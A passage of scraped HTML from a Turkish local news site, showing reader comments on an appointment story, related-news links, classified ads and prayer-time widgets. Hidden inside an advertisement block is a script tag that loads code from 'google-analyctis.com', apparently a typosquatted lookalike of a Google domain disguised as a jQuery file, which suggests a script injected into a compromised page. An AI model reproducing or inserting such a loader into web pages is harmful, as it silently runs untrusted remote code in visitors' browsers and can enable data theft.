bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(63968);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="63968" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" value="f6d486b9d3e8a768454300acef8b6acc3bfa5184" /> </form> </div> <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> <div id="comment_list"> <div class="comment_box row-fluid" id="comment_265522"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>HÜSEYİN ÖNAT</b> <small class="time">19 saat önce</small> <p class="text">Hayırlı olsun başarılar diliyorum.</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@HÜSEYİN ÖNAT" id="265522"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like265522" onclick="like(265522,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike265522">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike265522" onclick="like(265522,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike265522">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_265546"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Fehmi arslan</b> <small class="time">15 saat önce</small> <p class="text">Allah hayırlı uğurlu eylesin ali bey kardeşime yakışır</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Fehmi arslan" id="265546"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like265546" onclick="like(265546,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike265546">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike265546" onclick="like(265546,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike265546">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_265548"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>emrah ekici</b> <small class="time">15 saat önce</small> <p class="text">Allah&#39;ım hayırlı eylesin . başarılar..</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@emrah ekici" id="265548"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like265548" onclick="like(265548,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike265548">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike265548" onclick="like(265548,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike265548">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_265559"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Yaşar Okur</b> <small class="time">6 saat önce</small> <p class="text">Hayırlı olsun, Başarılar diliyorum İnşAllah</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Yaşar Okur" id="265559"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like265559" onclick="like(265559,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike265559">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike265559" onclick="like(265559,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike265559">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> </div> <!-- #comment_list --> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/guncel/cumhurbaskani-erdogan-elbistanli-ismi-genel-mudur-olarak-atadi-h63968.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-kuzey-aksinda-asfalt-calismalari-basladi-h63969.html" title="Elbistan’ın kuzey aksında asfalt çalışmaları başladı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/elbistanin_kuzey_aksinda_asfalt_calismalari_basladi_h63969_3a306.jpg" alt="Elbistan’ın kuzey aksında asfalt çalışmaları başladı" /> <span>Elbistan’ın kuzey aksında asfalt çalışmaları...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/okullarin-acilis-ve-tatil-tarihleri-belli-oldu-h63967.html" title="Okulların açılış ve tatil tarihleri belli oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/okullarin_acilis_ve_tatil_tarihleri_belli_oldu_h63967_4f560.jpg" alt="Okulların açılış ve tatil tarihleri belli oldu" /> <span>Okulların açılış ve tatil tarihleri belli oldu</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/polis-cakari-kullanan-surucuye-2-bin-4-lira-ceza-h63966.html" title="Polis çakarı kullanan sürücüye 2 bin 4 lira ceza"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/polis_cakari_kullanan_surucuye_2_bin_4_lira_ceza_h63966_72a16.jpg" alt="Polis çakarı kullanan sürücüye 2 bin 4 lira ceza" /> <span>Polis çakarı kullanan sürücüye 2 bin 4 lira ceza</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/ozel-belgede-sahtecilik-ve-dolandiricilik-iddiasi-1-tutuklama-h63965.html" title="Özel belgede sahtecilik ve dolandırıcılık iddiası: 1 tutuklama"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/ozel_belgede_sahtecilik_ve_dolandiricilik_iddiasi_1_tutuklama_h63965_0baa9.jpg" alt="Özel belgede sahtecilik ve dolandırıcılık iddiası: 1 tutuklama" /> <span>Özel belgede sahtecilik ve dolandırıcılık iddiası:...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/once-otomobille-carpisti-sonra-motosiklete-carpti-1-yarali-h63964.html" title="Önce otomobille çarpıştı sonra motosiklete çarptı: 1 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/once_otomobille_carpisti_sonra_motosiklete_carpti_1_yarali_h63964_385ee.jpg" alt="Önce otomobille çarpıştı sonra motosiklete çarptı: 1 yaralı" /> <span>Önce otomobille çarpıştı sonra motosiklete çarptı:...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/otomobille-hafif-ticari-arac-carpisti-1-yarali-h63963.html" title="Otomobille hafif ticari araç çarpıştı: 1 yaralı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/otomobille_hafif_ticari_arac_carpisti_1_yarali_h63963_ba9df.jpg" alt="Otomobille hafif ticari araç çarpıştı: 1 yaralı" /> <span>Otomobille hafif ticari araç çarpıştı: 1 yaralı</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-sayardan-veda-h63962.html" title="Kaymakam Sayar’dan veda"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/kaymakam_sayardan_veda_h63962_a46f3.jpg" alt="Kaymakam Sayar’dan veda" /> <span>Kaymakam Sayar’dan veda</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/0800-1800-arasi-cop-birakmak-yasak-h63961.html" title="08.00-18.00 arası çöp bırakmak yasak"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/0800_1800_arasi_cop_birakmak_yasak_h63961_3d8fb.jpg" alt="08.00-18.00 arası çöp bırakmak yasak" /> <span>08.00-18.00 arası çöp bırakmak yasak</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/elbistan-yediiklim-dershane-11249.html" title="ELBİSTAN YEDİİKLİM dershane" >ELBİSTAN YEDİİKLİM dershane</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/elbistan-yediiklim-dershane-11249.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="ELBİSTAN YEDİİKLİM dershane" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-11248.html" title="KİRALIK DAİRE ...." >KİRALIK DAİRE ....</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-11248.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="KİRALIK DAİRE ...." class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/yatili-bakici-araniyor-11243.html" title="YATILI BAKICI ARANIYOR" >YATILI BAKICI ARANIYOR</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/yatili-bakici-araniyor-11243.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="YATILI BAKICI ARANIYOR" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daireler-11239.html" title="KİRALIK DAİRELER" >KİRALIK DAİRELER</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daireler-11239.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="KİRALIK DAİRELER" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/modailgi-esvap-bayan-giyim-11238.html" title="modailgi esvap bayan giyim" >modailgi esvap bayan giyim</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/modailgi-esvap-bayan-giyim-11238.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="modailgi esvap bayan giyim" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kose-basi-kiralik-arsa-11231.html" title="Köşe başı kiralık arsa" >Köşe başı kiralık arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kose-basi-kiralik-arsa-11231.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/8225f09f605953d1ca1001895fcc580a62ccbbcb.jpg" alt="Köşe başı kiralık arsa" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kose-basi-kiralik-arsa-11230.html" title="Köşe başı kiralık arsa" >Köşe başı kiralık arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kose-basi-kiralik-arsa-11230.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Köşe başı kiralık arsa" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/uygun-fiyata-satilik-ofis-11228.html" title="UYGUN FİYATA SATILIK OFİS" >UYGUN FİYATA SATILIK OFİS</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/uygun-fiyata-satilik-ofis-11228.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="UYGUN FİYATA SATILIK OFİS" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/hukuk-burosunda-calisacak-bayan-eleman-araniyor-11226.html" title="Hukuk bürosunda çalışacak bayan eleman aranıyor.." >Hukuk bürosunda çalışacak bayan eleman aranıyor..</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/hukuk-burosunda-calisacak-bayan-eleman-araniyor-11226.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Hukuk bürosunda çalışacak bayan eleman aranıyor.." class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/papatya-ic-giyim-11225.html" title="Papatya iç giyim" >Papatya iç giyim</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/papatya-ic-giyim-11225.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Papatya iç giyim" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/yardimci-11218.html" title="Yardımcı" >Yardımcı</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/yardimci-11218.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Yardımcı" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahin-tepesinde-yesillik-icinde-11213.html" title="Şahin tepesinde yeşillik içinde" >Şahin tepesinde yeşillik içinde</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahin-tepesinde-yesillik-icinde-11213.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Şahin tepesinde yeşillik içinde" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/dunya-diyet-merkezine-eleman-araniyor-11208.html" title="DÜNYA DİYET MERKEZİNE ELEMAN ARANIYOR" >DÜNYA DİYET MERKEZİNE ELEMAN ARANIYOR</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/dunya-diyet-merkezine-eleman-araniyor-11208.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="DÜNYA DİYET MERKEZİNE ELEMAN ARANIYOR" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/insaat-sirketinde-calisacak-bayan-eleman-alinacak-11202.html" title="inşaat şirketinde çalışacak Bayan eleman alınacak" >inşaat şirketinde çalışacak Bayan eleman alınacak</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/insaat-sirketinde-calisacak-bayan-eleman-alinacak-11202.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="inşaat şirketinde çalışacak Bayan eleman alınacak" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-11197.html" title="KİRALIK DAİRE ...." >KİRALIK DAİRE ....</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-11197.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="KİRALIK DAİRE ...." class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="http://facebook.com/elbistaninsesi" target="blank" id="likes"></a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="http://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="http://twitter.com/elbistaninsesi" target="blank" id="followers"></a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="http://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/silahli-kavga-1-olu-1-yarali-h63765.html" title="Silahlı kavga: 1 ölü, 1 yaralı" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/07/silahli_kavga_1_olu_1_yarali_h63765_37336.JPG" alt="Silahlı kavga: 1 ölü, 1 yaralı" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/silahli-kavga-1-olu-1-yarali-h63765.html" title="" ><span class="en-hit">1.</span> <strong>Silahlı kavga: 1 ölü, 1 yaralı</strong> <span class="en-spot en-hidden">Elbistan’da alacak verecek meselesi yüzünden çıktığı iddia edilen...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/trafoda-cikan-yangin-elbistani-susuz-birakti-h63864.html" title="Trafoda çıkan yangın Elbistanı..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/trafoda_cikan_yangin_elbistani_susuz_birakti_h63864_e9bfb.JPG" alt="Trafoda çıkan yangın Elbistanı..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/trafoda-cikan-yangin-elbistani-susuz-birakti-h63864.html" title="" ><span class="en-hit">2.</span> <strong>Trafoda çıkan yangın Elbistan’ı...</strong> <span class="en-spot en-hidden">KASKİ’nin Kaynarca mevkiinde bulunan terfi istasyonunun elektrik trafosunda...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/gazinolarin-yikimina-baslandi-h63723.html" title="Gazinoların yıkımına başlandı" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/07/gazinolarin_yikimina_baslandi_h63723_b7dc0.jpg" alt="Gazinoların yıkımına başlandı" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/gazinolarin-yikimina-baslandi-h63723.html" title="" ><span class="en-hit">3.</span> <strong>Gazinoların yıkımına başlandı</strong> <span class="en-spot en-hidden">Elbistan’da faaliyet gösteren gazinoların yıkım işlemlerine geniş...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/arazi-anlasmazligi-tartismasi-kanli-bitti-1-olu-h63804.html" title="Arazi anlaşmazlığı tartışması..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/arazi_anlasmazligi_tartismasi_kanli_bitti_1_olu_h63804_e300f.jpg" alt="Arazi anlaşmazlığı tartışması..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/arazi-anlasmazligi-tartismasi-kanli-bitti-1-olu-h63804.html" title="" ><span class="en-hit">4.</span> <strong>Arazi anlaşmazlığı tartışması...</strong> <span class="en-spot en-hidden">Elbistan’a bağlı Beştepe Mahallesi’nde bir kişinin, arazi anlaşmazlığı...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/mehmet-aydin-h63742.html" title="Mehmet Aydın" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/07/mehmet_aydin_h63742_f8c6c.jpg" alt="Mehmet Aydın" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/mehmet-aydin-h63742.html" title="" ><span class="en-hit">5.</span> <strong>Mehmet Aydın</strong> <span class="en-spot en-hidden">Mehmet Aydın</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/gazinolarin-yikimina-baslandi-h63723.html" title="Gazinoların yıkımına başlandı" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/07/gazinolarin_yikimina_baslandi_h63723_b7dc0.jpg" alt="Gazinoların yıkımına başlandı"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/gazinolarin-yikimina-baslandi-h63723.html" title="" ><span class="en-hit">1.</span> <strong>Gazinoların yıkımına başlandı</strong> <span class="en-spot en-hidden">Elbistan’da faaliyet gösteren gazinoların yıkım işlemlerine geniş...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/mevlut-ahmet-topsakal-91-yasinda-h63874.html" title="Mevlüt Ahmet Topsakal 91 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/mevlut_ahmet_topsakal_91_yasinda_h63874_6d171.jpg" alt="Mevlüt Ahmet Topsakal 91 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/mevlut-ahmet-topsakal-91-yasinda-h63874.html" title="" ><span class="en-hit">2.</span> <strong>Mevlüt Ahmet Topsakal 91 yaşında</strong> <span class="en-spot en-hidden">Mevlüt Ahmet Topsakal 91 yaşında</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/muftu-kilinc-islamin-boyle-bir-emri-yok-h63814.html" title="Müftü Kılınç, İslamın..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/muftu_kilinc_islamin_boyle_bir_emri_yok_h63814_4fb19.jpg" alt="Müftü Kılınç, İslamın..."></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/muftu-kilinc-islamin-boyle-bir-emri-yok-h63814.html" title="" ><span class="en-hit">3.</span> <strong>Müftü Kılınç, “İslam’ın...</strong> <span class="en-spot en-hidden">Elbistan İlçe 